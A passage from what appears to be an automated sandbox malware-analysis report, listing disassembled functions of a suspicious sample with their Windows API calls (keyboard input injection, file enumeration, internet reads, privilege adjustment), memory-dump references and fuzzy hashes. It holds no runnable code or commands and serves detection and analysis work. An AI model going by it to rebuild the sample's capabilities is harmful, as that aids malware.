                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastinet_addrsocket
                                • String ID:
                                • API String ID: 4170576061-0
                                • Opcode ID: 9f6ab270bb742378045c75324410c7f7c01037c8bd67cfbd7c301d6d5f8ce7d0
                                • Instruction ID: f624d24691e7f5dae87bd324f98f389d49c005e07b37d6082f3aa3c071de5afa
                                • Opcode Fuzzy Hash: 9f6ab270bb742378045c75324410c7f7c01037c8bd67cfbd7c301d6d5f8ce7d0
                                • Instruction Fuzzy Hash: 4841C370600210AFDB10AF38CC86E7E77EDEF44728F148158F956AB392DB74AE019B91
                                Function 00CAF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAF37A
                                • _wcscmp.LIBCMT ref: 00CAF3AA
                                • _wcscmp.LIBCMT ref: 00CAF3BF
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF3D0
                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CAF3FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File_wcscmp$CloseFirstNext
                                • String ID:
                                • API String ID: 2387731787-0
                                • Opcode ID: c5a49d3473d43b39ce0dbe988e2d74923bbe1edfb60cddf5c6707e044f581386
                                • Instruction ID: c09fedcb7fcf1fea355b933f5b2dfffbc03f6bd8fe02c4b1a02be516fb13d992
                                • Opcode Fuzzy Hash: c5a49d3473d43b39ce0dbe988e2d74923bbe1edfb60cddf5c6707e044f581386
                                • Instruction Fuzzy Hash: E241BF356003029FC718DF68C4D0A9AB7E4FF4A328F10452DE96ACB3A1DB31E946DB91
                                Function 00CC20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00CC20EC,?,00CC22E0), ref: 00CC2104
                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CC2116
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetProcessId$kernel32.dll
                                • API String ID: 2574300362-399901964
                                • Opcode ID: fafd767712d3d8386f5acfe5dc2826cd2071630858aa530d3e7b2c1eed31074e
                                • Instruction ID: 213ce5c2594e54f8a0fabbd9a900ade6b8c05ea71086c7589f003ac30134a332
                                • Opcode Fuzzy Hash: fafd767712d3d8386f5acfe5dc2826cd2071630858aa530d3e7b2c1eed31074e
                                • Instruction Fuzzy Hash: 40D0A7344003529FD7205F60F84DB4E36D4AB04320B04541DE65AD1154DB70C8C0CB20
                                Function 00C72B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _memmove.LIBCMT ref: 00C72C63
                                • _memmove.LIBCMT ref: 00C7303A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID: @
                                • API String ID: 1300846289-2766056989
                                • Opcode ID: b179c5cd47f1789ea32fd99bf30a7a8a286884ad85290b498b3a757cef2ef25b
                                • Instruction ID: d23fe11f92799cedd8be5e0a3dd2e3f80302e9cc5abed72d303fc2f9a4f6330e
                                • Opcode Fuzzy Hash: b179c5cd47f1789ea32fd99bf30a7a8a286884ad85290b498b3a757cef2ef25b
                                • Instruction Fuzzy Hash: ECC2AF74A00245DFCF24DF95C890AADB7B1FF48310F24805AE91AAB351DB35EE46DB91
                                Function 00CA4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CA439C
                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CA43B8
                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CA4425
                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CA4483
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: d536bec05e57ed57f6f3b582912081a4f05ed31518b19b99dc362f0f26729cfd
                                • Instruction ID: 289c8f4094db1f7e347d51d3de948be8d0f40332f823f70ca9e8679c2ed02bf1
                                • Opcode Fuzzy Hash: d536bec05e57ed57f6f3b582912081a4f05ed31518b19b99dc362f0f26729cfd
                                • Instruction Fuzzy Hash: D44129B090034AAAEF288B6598497FD7BB5ABCA319F04011AF591972C1C7F8CE85D761
                                Function 00CA220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CA221E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: ($|
                                • API String ID: 1659193697-1631851259
                                • Opcode ID: 218f629de4f801754d4a16a0ab7faba31c0935af2f4b2c29f054003f928dda3c
                                • Instruction ID: 854638e6dbdb12165153a79769eb33ac5189c8ad09c8e4309e13c657c52c4c48
                                • Opcode Fuzzy Hash: 218f629de4f801754d4a16a0ab7faba31c0935af2f4b2c29f054003f928dda3c
                                • Instruction Fuzzy Hash: 8E322675A006169FCB28DF69C480A6AF7F0FF49324B11C56EE4AADB3A1D770E941CB44
                                Function 00C7AD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C7AE5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LongProcWindow
                                • String ID:
                                • API String ID: 3265722593-0
                                • Opcode ID: b7ad0d8a333734037812958e16d51373786f7ce8b38de21207adf945e3416afe
                                • Instruction ID: ca2ba01f45cc3777babc759790d50b8748638582a6d9ae345ef7cffe61dbfaf0
                                • Opcode Fuzzy Hash: b7ad0d8a333734037812958e16d51373786f7ce8b38de21207adf945e3416afe
                                • Instruction Fuzzy Hash: 98A12B64104204BADB38AB3A8C88E7F395DFBD5741B11C52EF51BD62B1CA158E12A273
                                Function 00CB550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CB4A1E,00000000), ref: 00CB55FD
                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CB5629
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$AvailableDataFileQueryRead
                                • String ID:
                                • API String ID: 599397726-0
                                • Opcode ID: b4f0b4166245e09d18dc234467ee96eb61fb1c92ef0773c4a87f755b9226a170
                                • Instruction ID: c9c4963b61514ff1f0068e4beedbeb639eb030b7902ec2b55e68ef59a934ec9e
                                • Opcode Fuzzy Hash: b4f0b4166245e09d18dc234467ee96eb61fb1c92ef0773c4a87f755b9226a170
                                • Instruction Fuzzy Hash: 4941D371900A09BFEB209F91DC85FFFB7BDEB40729F10401AF615A6280DA719F45AB64
                                Function 00CAEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAEA95
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CAEAEF
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CAEB3C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID:
                                • API String ID: 1682464887-0
                                • Opcode ID: c55d3dabaf8ec49ff303a5215d460e88b96bcd6a40507ee23caf5890c26dd0e3
                                • Instruction ID: 0bf8050d95222d27811bccc8f5f5ee70baf158b43242e87c5e7d2a319b82c82c
                                • Opcode Fuzzy Hash: c55d3dabaf8ec49ff303a5215d460e88b96bcd6a40507ee23caf5890c26dd0e3
                                • Instruction Fuzzy Hash: C7216D35A00219EFCB00DFA5D894AEEBBB8FF49324F1480A9E946EB351DB31D905DB50
                                Function 00CA70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA70D8
                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CA7115
                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA711E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle
                                • String ID:
                                • API String ID: 33631002-0
                                • Opcode ID: 4adc3da210e5de31c142cb40c427fbe67dbf21668306079ed02345a63c6eafb9
                                • Instruction ID: 018725042b252f5bb8fdc0c1c94c7206a939b36cad1361bc48cabb085f0ac87a
                                • Opcode Fuzzy Hash: 4adc3da210e5de31c142cb40c427fbe67dbf21668306079ed02345a63c6eafb9
                                • Instruction Fuzzy Hash: 8C11A5B1900229BEE7108BA8DC45FAF77FCEB09714F004655BA15EB190D2749E0487E1
                                Function 00C66670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: eea032f12a9ec61bb2e27d9974dfcd60633f5c2f0c697be4a7efc347d399853f
                                • Instruction ID: e84ebfb322b4d98573ffc694a99625a9ea91e0128103923693baa5dd3a4b019f
                                • Opcode Fuzzy Hash: eea032f12a9ec61bb2e27d9974dfcd60633f5c2f0c697be4a7efc347d399853f
                                • Instruction Fuzzy Hash: 80A24B75D00259CFCB24CF99C4806ADBBB1FF48314F2581AAE869AB391D7749E81DF90
                                Function 00C6DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d2bdace5d607ea8ac1e2cb203b98a7eed2d79cac29bc56fb5183356cd32b6822
                                • Instruction ID: f4382e8757f94695717c61861d9e0653b377b0d10b0cf1949d5486380a2498ed
                                • Opcode Fuzzy Hash: d2bdace5d607ea8ac1e2cb203b98a7eed2d79cac29bc56fb5183356cd32b6822
                                • Instruction Fuzzy Hash: DD229E74E00206DFDB24DF58C490AAEB7F0FF19310F14806AE9579B391E771AA85DB92
                                Function 00CAFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAFD71
                                • FindClose.KERNEL32(00000000), ref: 00CAFDA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: 8f83748dbf6685b728a3dd7a062099494659f82f8ad07e32e8715e0fa3c50225
                                • Instruction ID: 07fca74ca5c107b802947b2a4b063b0fd25e210ee11e4a1cde1f1640c1e65a34
                                • Opcode Fuzzy Hash: 8f83748dbf6685b728a3dd7a062099494659f82f8ad07e32e8715e0fa3c50225
                                • Instruction Fuzzy Hash: 741180726106059FD710EF69C895A2EB7E8FF85324F00851EF9AADB391DB34ED058B81
                                Function 00CAD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CBC2E2,?,?,00000000,?), ref: 00CAD73F
                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CBC2E2,?,?,00000000,?), ref: 00CAD751
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: d6c6896950a5b38ed9c3ad8727cae4b9d9afa61b8b8a7b7b8e96a301a6daa6ec
                                • Instruction ID: a8b0e4640873d9b89ec736640764137a6f9bbbc70ea3e633f24a5c5a148d4495
                                • Opcode Fuzzy Hash: d6c6896950a5b38ed9c3ad8727cae4b9d9afa61b8b8a7b7b8e96a301a6daa6ec
                                • Instruction Fuzzy Hash: 6BF0823510032DABDB21AFA4CC89FEA776CAF4A351F008115B916D6191D770DA40DBA0
                                Function 00CA4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CA4B89
                                • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 00CA4B9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InputSendkeybd_event
                                • String ID:
                                • API String ID: 3536248340-0
                                • Opcode ID: 588175852f7b0bd8d6ca8f1983801aae42e919508af0c6a4b420d61ed6dbece7
                                • Instruction ID: 4ecc4adf7abfb5323246af1cd7a38e92372bd137841a6998b5a8427f2aa361fb
                                • Opcode Fuzzy Hash: 588175852f7b0bd8d6ca8f1983801aae42e919508af0c6a4b420d61ed6dbece7
                                • Instruction Fuzzy Hash: 8FF0907080038EAFDB058FA1D805BBE7BB4EF00309F04840AF961A9191D3B9C611DFA0
                                Function 00C9B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C9B9EC), ref: 00C9B8C5
                                • CloseHandle.KERNEL32(?,?,00C9B9EC), ref: 00C9B8D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AdjustCloseHandlePrivilegesToken
                                • String ID:
                                • API String ID: 81990902-0
                                • Opcode ID: edf552e83fbb82c9278a8a46768f27ce9c4d3414983152dc34c4279508c1260e
                                • Instruction ID: ee169c48a666a4b86e4b1f966f28e571c4f866c96a2baa83e21e599159e87b2c
                                • Opcode Fuzzy Hash: edf552e83fbb82c9278a8a46768f27ce9c4d3414983152dc34c4279508c1260e
                                • Instruction Fuzzy Hash: C4E08631000500AFE7222B50FC49E7B77EDEF05321B20841DF45684470C7225CD0EB10
                                Function 00C88E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,00C6125D,00C87A43,00C60F35,?,?,00000001), ref: 00C88E41
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C88E4A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 3e62a9f90387c8aab4f26668f046c0c6d753fc33cf39e72132a9c114c8f8aa68
                                • Instruction ID: 811d9a6674fce59482190f8f241f5ae582730675f82ce872717e388e698cb31b
                                • Opcode Fuzzy Hash: 3e62a9f90387c8aab4f26668f046c0c6d753fc33cf39e72132a9c114c8f8aa68
                                • Instruction Fuzzy Hash: A1B09271044B48ABEA002BA1EC49B8E3F78EB08A62F004010F61E4C4708B6354508A92
                                Function 00C9113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80c8999e59561988f77df6b16ba1c8d09a1ff80cc4fcacfef2ef7eb803307ab6
                                • Instruction ID: 026c367aa7d769713796b9d0dc093da2297198206d1824baa014d95a2bf75f3e
